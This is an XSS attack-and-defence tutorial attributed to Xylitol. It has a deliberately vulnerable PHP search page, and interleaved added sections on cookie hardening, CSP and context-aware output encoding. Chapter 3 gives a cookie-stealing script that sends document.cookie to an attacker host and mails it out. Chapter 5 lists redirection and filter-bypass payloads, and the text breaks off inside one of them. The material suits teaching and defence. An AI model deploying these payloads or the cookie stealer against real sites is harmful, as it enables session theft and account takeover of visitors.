Author: Xylitol Original: http://xylitol.free.fr
From: http://keepseo.com/2009/04/xss-attack-defense-guide.htm
Table of contents
XSS attack and prevention guide
Chapter 1. Definition of XSS
Chapter 2. XSS vulnerability code
Chapter 3. Using XSS to steal cookies
Chapter 4. XSS vulnerability prevention
Chapter 5. XSS attack methods
Chapter 6. XSS attacks using Flash
Chapter 7. XSS attacks on uploaded files
Chapter 8. Phishing using XSS vulnerabilities
Chapter 1: XSS Definition
Wikipedia's entry on cross-zone scripting (also filed under cross-site scripting) describes it as an attack that takes advantage of a vulnerability in a browser's zone-based security solution: script that should run without privileges is executed with the permissions of a higher-privileged zone, so the script's execution rights are extended and elevated by the client (the web browser).
These cross-site scripting vulnerabilities may come from:
* A design defect in the web browser that, under certain conditions, lets one website be fully trusted as another, higher-privileged site (or lets a low-privilege zone be treated as a high-privilege one) and so lets it execute scripts with the high-privilege site's rights.
* A misconfigured browser, with an insecure website placed in the browser's high-trust list.
* A cross-site scripting vulnerability in a trusted site (a privileged zone).
Generally, an XSS attack takes two steps. The first uses the cross-site scripting vulnerability to run the attacker's script in a privileged mode; the script then uses insecure ActiveX controls to carry out the malicious behaviour. Silently, the computer is made to browse to a page chosen by the attacker and install malicious code such as spyware, trojans and worms.
Chapter 2. XSS vulnerability code
Open Notepad and paste the following code into it:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type="text/css">
<!--
body, td, th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style>
<title>Simple XSS vulnerability by Xylitol</title>
</head>
<body>
<form action="XSS.php" method="post">
<p align="center"><strong>Simple XSS vulnerability by Xylitol</strong></p>
<div align="center">
<table width="270" border="0">
<tr>
<td width="106"><strong>Search:</strong></td>
<td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /></td>
</tr>
</table>
<table width="268" border="0">
<tr>
<td width="262"><div align="center">
<input name="submit" type="submit" value="Search it!" />
</div></td>
</tr>
</table>
</div>
</form>
</body>
</html>
Then save the page as index.html, and copy the following code into Notepad:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Search result:</title>
<style type="text/css">
<!--
body, td, th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style>
</head>
<body>
<span class="alerte">Search result:</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>
</html>
Save it as XSS.php and close Notepad. Open index.html in Firefox, enter a string in the search box and press Enter: the page echoes it back unchanged. Now enter <script>alert('XSS')</script> in the search box and click the button; an alert window pops up. This is the cross-site scripting vulnerability.
Chapter 3. Using XSS to steal cookies
Insert the following code into a vulnerable page, such as a guestbook:
<script>
window.open("http://www.Hax0r.com/cookie.php?cookies=" + document.cookie);
</script>
(www.Hax0r.com = the attacker's website)
Use Notepad to create a file named cookie.php and copy the following code into it:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body, td, th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style>
</head>
<?php
/* $cookies is meant to be the ?cookies= query parameter; reading it as a bare
   variable relies on register_globals, which is off by default since PHP 4.2
   and was removed in PHP 5.4. */
mail("email@example.com", "Cookie stealed! -Thx xyli :)", $cookies);
?>
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <?php echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>
That is all there is to it on the page; the stolen cookies arrive by e-mail, so you then wait for the message.
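The defensive counterpart to the stealer above, added here as an example and not part of Xylitol's tutorial: the exfiltration works only because document.cookie can read the session cookie. Marking the cookie HttpOnly removes it from script access, SameSite and Secure limit where it travels, and a Content-Security-Policy refuses the inline <script> and the remote window.open/embed targets the tutorial uses. The cookie name "prefs", its value and the policy values are this example's own choices; 'self' is a CSP keyword. The SameSite option for ini_set and the setcookie options array require PHP 7.3 or later.

```php
<?php
// Added example: hardening the cookies and the response so that
// "...cookie.php?cookies=" + document.cookie has nothing to read and the
// injected script is not executed in the first place.

// Session cookie flags. These must be set before session_start().
ini_set('session.cookie_httponly', '1');  // invisible to document.cookie
ini_set('session.cookie_secure',   '1');  // only ever sent over HTTPS
ini_set('session.cookie_samesite', 'Strict'); // not sent on cross-site requests (PHP 7.3+)
ini_set('session.use_only_cookies', '1'); // never accept a session id from the URL
session_start();

// Same flags for an application cookie set by hand ("prefs" is a constructed
// example name; options-array form of setcookie is PHP 7.3+).
setcookie('prefs', 'dark', [
    'expires'  => time() + 86400,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);

// Content Security Policy: scripts only from this origin (so an inline
// <script> injected into a guestbook entry, a javascript: URL, or a remote
// .js/.swf load is blocked), no plugins, and no framing of this page.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'");

// Stop browsers from sniffing an uploaded "image" into HTML.
header('X-Content-Type-Options: nosniff');
```

With these headers in place the guestbook injection from this chapter still lands in the page source, so the underlying bug must still be fixed by output encoding (Chapter 4); the cookie flags and CSP only take away the payoff and give the browser a reason to report the blocked script (the report-uri / report-to CSP directives can be added to collect those reports server-side).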
Chapter 4. XSS vulnerability prevention
How can I fix this vulnerability?
We can use the htmlentities function to fix this vulnerability. Replace line 16 of the XSS.php above:
<body>
<span class="alerte">Search result:</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>
with:
<body>
<span class="alerte">Search result:</span>&nbsp;<strong><?php
if (isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); }
?></strong>&nbsp;
</body>
You can also use the other built-in PHP functions such as htmlspecialchars(), htmlentities() and strip_tags().
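A fuller version of the fix, added here as an example rather than taken from the tutorial: htmlentities() on its own is only correct when the value lands in HTML text. The "Bypass filtering" list in Chapter 5 below works by starting with "> to close an attribute the value was echoed into, by relying on the default flags leaving a single quote unencoded, or by putting a javascript: URL where a URL is expected, where no character needs encoding at all. The functions e(), attr() and safe_url() and the fallback value about:blank are this example's own names; the $_POST['Vulnerability'] field and the page layout are the tutorial's.

```php
<?php
// Added example: context-aware output encoding for XSS.php (not Xylitol's code).

// HTML text and attribute context: encode < > & " and ' (ENT_QUOTES), name the
// charset so multibyte tricks cannot desynchronise the encoder, and replace
// invalid UTF-8 instead of silently returning an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Attribute context: the caller gets the quotes back with the value, because an
// unquoted attribute lets a plain space start a new one (e.g. onload=...).
function attr(string $s): string
{
    return '"' . e($s) . '"';
}

// URL context (href, src, meta-refresh targets): encoding is not enough, since
// javascript:alert('XSS') contains nothing that htmlspecialchars() would touch.
// Accept only well-formed http(s) URLs, then encode for the attribute.
function safe_url(string $s): string
{
    $u = filter_var(trim($s), FILTER_VALIDATE_URL);
    $scheme = $u === false ? '' : strtolower((string) parse_url($u, PHP_URL_SCHEME));
    if ($u === false || !in_array($scheme, ['http', 'https'], true)) {
        return 'about:blank'; // example fallback for anything that is not http(s)
    }
    return e($u);
}

$q = isset($_POST['Vulnerability']) ? (string) $_POST['Vulnerability'] : '';
header('Content-Type: text/html; charset=UTF-8'); // declare the charset the encoder used
header('X-Content-Type-Options: nosniff');
?>
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>Search result</title></head>
<body>
<span class="alerte">Search result:</span>&nbsp;<strong><?= e($q) ?></strong>
<!-- the same value echoed into an attribute and into a URL, each with its own encoder -->
<input name="Vulnerability" type="text" value=<?= attr($q) ?>>
<a href="<?= safe_url($q) ?>">open</a>
</body>
</html>
```

Submitting the tutorial's <script>alert('XSS')</script> now renders as literal text, the "><script>... entries cannot close the quoted value attribute because " becomes &quot;, and javascript:alert('XSS') in the link is replaced by about:blank. The check to keep in mind is where each echo lands: text, attribute and URL each get their own encoder, and a value that must go inside an existing <script> block needs JSON encoding (json_encode() with the JSON_HEX_TAG and JSON_HEX_AMP flags), not any of the three above.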
Chapter 5. XSS attack methods
Attacking with XSS is quite simple. Here we mainly cover several attack methods:
Image attack:
Or video/Flash: <embed src=http://hax0r.com/Haxored.swf
Website redirection: <script>window.open("http://www.hax0r.com/Haxored.html")</script>
Or: <meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />
Bypassing filters to find further XSS
In fact, bypassing htmlspecialchars() filtering is very simple. Here are some ways of bypassing the filter:
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS');">
">><marquee>
">><script>alert('XSS')</script>
>><marquee>
"><script>alert(String.fromCharCode(88,83,83))</script>
<iframe <?php echo chr(11) ?> onload=alert('XSS')></iframe>
<div
style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));